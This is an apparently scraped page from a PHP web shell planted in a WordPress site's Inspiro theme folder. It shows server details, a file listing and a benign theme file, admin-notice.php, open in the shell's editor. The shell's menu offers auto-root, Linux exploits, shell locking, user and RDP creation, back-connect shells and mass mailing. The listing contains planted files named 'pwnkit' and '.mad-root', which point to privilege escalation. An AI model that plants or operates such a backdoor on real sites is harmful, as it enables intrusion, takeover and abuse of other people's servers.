Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.101
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
inspiro /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
dynamic-css
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin-notice.php
4.72
KB
-rw-r--r--
back-compat.php
2.27
KB
-rw-r--r--
color-patterns.php
723
B
-rw-r--r--
common-functions.php
18.44
KB
-rw-r--r--
custom-header.php
18.26
KB
-rw-r--r--
customizer-functions.php
4.96
KB
-rw-r--r--
editor-fonts.php
2.53
KB
-rw-r--r--
google-fonts.php
186.01
KB
-rw-r--r--
icon-functions.php
2.41
KB
-rw-r--r--
marketing-functions.php
9.95
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
shortcodes.php
938
B
-rw-r--r--
starter-content.php
125.28
KB
-rw-r--r--
template-functions.php
7.5
KB
-rw-r--r--
template-tags.php
7.29
KB
-rw-r--r--
theme-media.php
2.4
KB
-rw-r--r--
wc-custom-functions.php
456
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin-notice.php
<?php /** * Admin notice after Theme activation * * @package Inspiro * @subpackage Inspiro_Lite * @since Inspiro 1.2.2 */ if ( ! defined( 'ABSPATH' ) ) { exit; } if ( ! function_exists( 'inspiro_admin_notice' ) ) { /** * Welcome Notice after Theme Activation * * @return void */ function inspiro_admin_notice() { global $pagenow, $inspiro_version; $welcome_notice = get_option( 'inspiro_notice_welcome' ); $current_user_can = current_user_can( 'edit_theme_options' ); $plugin_status = inspiro_check_plugin_status( 'inspiro-starter-sites/inspiro-starter-sites.php' ); $theme_dashboard = ( 'admin.php' === $pagenow && isset( $_GET['page'] ) && 'inspiro' === $_GET['page'] ); // phpcs:ignore WordPress.Security.NonceVerification.Recommended $should_display_notice = ( 'active' !== $plugin_status && ! $welcome_notice && ! $theme_dashboard ); // phpcs:ignore WordPress.Security.NonceVerification.Recommended if ( $should_display_notice ) { wp_enqueue_style( 'inspiro-admin-notice', inspiro_get_assets_uri( 'welcome-notice', 'css' ), array(), INSPIRO_THEME_VERSION ); inspiro_welcome_notice(); } } } add_action( 'admin_notices', 'inspiro_admin_notice' ); if ( ! function_exists( 'inspiro_hide_notice' ) ) { /** * Hide Welcome Notice in WordPress Dashboard * * @return void */ function inspiro_hide_notice() { if ( isset( $_GET['inspiro-hide-notice'] ) && isset( $_GET['_inspiro_notice_nonce'] ) ) { if ( ! check_admin_referer( 'inspiro_hide_notices_nonce', '_inspiro_notice_nonce' ) ) { wp_die( esc_html__( 'Action failed. Please refresh the page and retry.', 'inspiro' ) ); } if ( ! current_user_can( 'edit_theme_options' ) ) { wp_die( esc_html__( 'You do not have the necessary permission to perform this action.', 'inspiro' ) ); } $hide_notice = sanitize_text_field( wp_unslash( $_GET['inspiro-hide-notice'] ) ); update_option( 'inspiro_notice_' . $hide_notice, 1 ); } } } add_action( 'wp_loaded', 'inspiro_hide_notice' ); if ( ! function_exists( 'inspiro_welcome_notice' ) ) { /** * Content of Welcome Notice in WordPress Dashboard * * @return void */ function inspiro_welcome_notice() { $plugin_status = inspiro_check_plugin_status( 'inspiro-starter-sites/inspiro-starter-sites.php' ); $note_html = ''; if ( 'not_installed' === $plugin_status ) { $note_html = __( 'Clicking "Starter Sites" will install and activate Inspiro Starter Sites plugin on your WordPress site.', 'inspiro' ); } elseif ( 'installed' === $plugin_status ) { $note_html = __( 'Clicking "Starter Sites" will activate Inspiro Starter Sites plugin on your WordPress site.', 'inspiro' ); } ?> <div class="notice wpz-welcome-notice"> <a class="notice-dismiss wpz-welcome-notice-hide" href="<?php echo esc_url( wp_nonce_url( remove_query_arg( array( 'activated' ), add_query_arg( 'inspiro-hide-notice', 'welcome' ) ), 'inspiro_hide_notices_nonce', '_inspiro_notice_nonce' ) ); ?>"> <span class="screen-reader-text"> <?php echo esc_html__( 'Dismiss this notice.', 'inspiro' ); ?> </span> </a> <div class="wpz-notice-heading"> <h3><?php echo esc_html__( 'Welcome to Inspiro! 👋', 'inspiro' ); ?></h3> <p><?php esc_html_e( 'Your Inspiro theme is now ready for use. To guide you through the next steps, we\'ve compiled a collection of helpful resources on this page.', 'inspiro' ); ?></p> </div> <div class="wpz-notice-content"> <div class="wpz-notice-image"> <a href="https://www.wpzoom.com/themes/inspiro/?utm_source=wpadmin&utm_medium=adminnotice&utm_campaign=welcome-banner" title="Inspiro Premium" target="_blank"><img src="<?php echo esc_url( get_template_directory_uri() . '/assets/images/admin/inspiro-top.png' ); ?>" width="180" alt="<?php echo esc_attr__( 'Inspiro Premium', 'inspiro' ); ?>" /></a> </div> <div class="wpz-notice-text"> <p><?php esc_html_e( 'Explore a vast library of pre-designed sites within Inspiro. Visit our constantly growing collection of demos to find the perfect starting point for your project.', 'inspiro' ); ?></p> <div class="wpz-welcome-notice-button"> <a id="wpz-notice-inspiro-plugin-handle" class="button button-primary" data-plugin-status="<?php echo esc_attr( $plugin_status ); ?>" href="<?php echo esc_url( admin_Url( 'admin.php?page=inspiro-demo' ) ); ?>"><?php esc_html_e( 'Starter Sites', 'inspiro' ); ?></a> <a class="button button-secondary" href="<?php echo esc_url( admin_url( 'admin.php?page=inspiro' ) ); ?>"> <?php esc_html_e( 'Theme Dashboard', 'inspiro' ); ?> </a> </div> <?php if ( $note_html ) { printf( '<note>%s</note>', wp_kses_post( $note_html ) ); } ?> </div> </div> </div> <?php } }
Close